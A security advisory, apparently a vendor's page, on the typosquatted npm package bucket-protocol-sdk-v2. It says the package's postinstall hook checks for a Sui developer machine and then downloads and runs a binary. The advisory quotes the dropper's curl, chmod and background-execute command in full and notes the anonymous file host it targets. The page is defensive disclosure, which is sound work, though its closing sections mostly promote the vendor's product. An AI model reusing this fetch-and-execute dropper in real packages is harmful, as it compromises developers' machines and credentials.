bucket-protocol-sdk-v2npm
Malicious code in bucket-protocol-sdk-v2 (npm) Remove it immediately and rotate any exposed credentials.
What this malware does
bucket-protocol-sdk-v2 advertises itself as a 'community maintained drop-in replacement' for the Sui ecosystem's bucket-protocol-sdk, but its src/ tree contains only empty stubs (bucket.ts: export {};, index.ts: export * from './bucket';) — no real SDK code is shipped. The entire payload is the postinstall hook. package.json declares "postinstall": "node install.js"; install.js checks whether the host is a Sui developer (presence of the sui binary or ~/.sui/sui_config/client.yaml) and then runs curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper & to fetch, stage, and background-execute an attacker binary at a hidden /tmp path. The variable is literally named implantUrl with the comment PUT YOUR ACTUAL 0x0.st URL HERE, identifying the intended payload host as the anonymous 0x0.st file dump. The URL is currently an empty string in this published version (staged/broken release), so today's install does not actually fetch a binary, but the dropper scaffolding, target-gating, hidden staging path, backgrounded execution, and typosquat-of-a-Sui-SDK lure are unambiguous. Any subsequent republish trivially fills the URL. The combination of hostile-named scaffolding, dev-machine-targeting gate, anonymous-host comment, and hollow library content satisfies the namespace-abuse-typosquat-with-payload and generic-binary-runner-dropper patterns.
Malicious versions
Indicators of compromise (SHA-256)
Detection & response playbook
TyposquatFind it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for bucket-protocol-sdk-v2 (7 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging bucket-protocol-sdk-v2 across your stack and pipelines.
If you installed it — respond
bucket-protocol-sdk-v2 is a typosquat — you almost certainly intended a legitimately-named package. Remove bucket-protocol-sdk-v2, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.
Did it already run?
If bucket-protocol-sdk-v2 was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks bucket-protocol-sdk-v2 before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.
Frequently asked questions
Campaign
References
Credits
- Amazon Inspector · finder
Detect & block this
O3 blocks bucket-protocol-sdk-v2-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.